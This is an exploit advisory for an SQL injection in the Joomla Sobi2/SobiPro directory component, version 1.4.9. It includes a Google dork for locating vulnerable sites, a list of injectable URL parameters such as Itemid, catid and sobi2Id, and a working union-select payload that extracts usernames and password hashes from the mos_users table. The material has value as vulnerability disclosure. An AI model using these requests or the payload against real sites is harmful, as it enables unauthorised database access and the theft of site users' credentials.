Joomla Sobi2 SobiPro 1.4.9 SQL Injection

`####################################################################  
  
# Exploit Title : Joomla Sobi2 SobiPro Components 1.4.9 SQL Injection  
# Author [ Discovered By ] : KingSkrupellos  
# Team : Cyberizm Digital Security Army  
# Date : 01/02/2019  
# Vendor Homepage : sigsiu.net  
# Software Download Link : sigsiu.net/center/sobipro-component  
# Software Information Links : joomla4ever.org/extensions/ext-sobi2  
extensions.joomla.org/extension/sobipro/  
# Software Version : 1.4.9 and J3.x  
# Affected All Versions : Joomla 1.5 - 1.0.8; Joomla 2.5, Joomla 3.x - 1.1.10  
# Tested On : Windows and Linux  
# Category : WebApps  
# Exploit Risk : Medium  
# Google Dorks : inurl:''/index.php?option=com_sobi2''  
# Vulnerability Type : CWE-89 [ Improper Neutralization of   
Special Elements used in an SQL Command ('SQL Injection') ]  
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968  
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/  
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos  
  
####################################################################  
  
# Description about Software :  
***************************  
  
SobiPro - creating and building a business directory for CMS Joomla.  
  
SobiPro is an advanced powerful multi-content directory component for Joomla!   
  
that has been originally designed as a directory extension with CCK features.  
  
With SobiPro you can easily create multiple directories or any type of content.  
  
####################################################################  
  
# Impact :  
***********  
  
Joomla Sobi2 SobiPro 1.4.9 and other versions component for Joomla! is   
  
prone to an SQL-injection vulnerability because it fails to sufficiently   
  
sanitize user-supplied data before using it in an SQL query.   
  
A successful exploit may allow an attacker to compromise the application, access   
  
or modify data, or exploit latent vulnerabilities in the underlying database.  
  
A remote attacker can send a specially crafted request to the vulnerable application   
  
and execute arbitrary SQL commands in application`s database.  
  
Further exploitation of this vulnerability may result in unauthorized data manipulation.  
  
An attacker can exploit this issue using a browser.  
  
####################################################################  
  
# SQL Injection Exploit :  
**********************  
  
/index.php?option=com_sobi2&Itemid=[SQL Injection]  
  
/index.php?option=com_sobi2&catid=[ID-NUMBER]&Itemid=[SQL Injection]  
  
/index.php?option=com_sobi2&letter=[LETTER-HERE]&Itemid=[SQL Injection]  
  
/index.php?option=com_sobi2&sobi2Task=popularListing&Itemid=[SQL Injection]  
  
/index.php?option=com_sobi2&sobi2Task=sobi2Details&catid=[SQL Injection]  
  
/index.php?option=com_sobi2&catid=[ID-NUMBER]&limitstart=[SQL Injection]  
  
/index.php?option=com_sobi2&sobi2Task=sobi2Details&catid=  
[ID-NUMBER]&sobi2Id=[SQL Injection]  
  
/index.php?option=com_sobi2&sobi2Task=sobi2Details&catid=  
[ID-NUMBER]&sobi2Id=[ID-NUMBER]&Itemid=[SQL Injection]  
  
/index.php?option=com_sobi2&Itemid=27&catid=[SQL Injection]  
  
# Example Exploit Payload :  
*************************  
  
-99999/**/union/**/select/**/0,0,password,0,0,0,0,0,0,0,0,0,username/**/from/**/mos_users/*  
  
####################################################################  
  
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team   
  
####################################################################  
`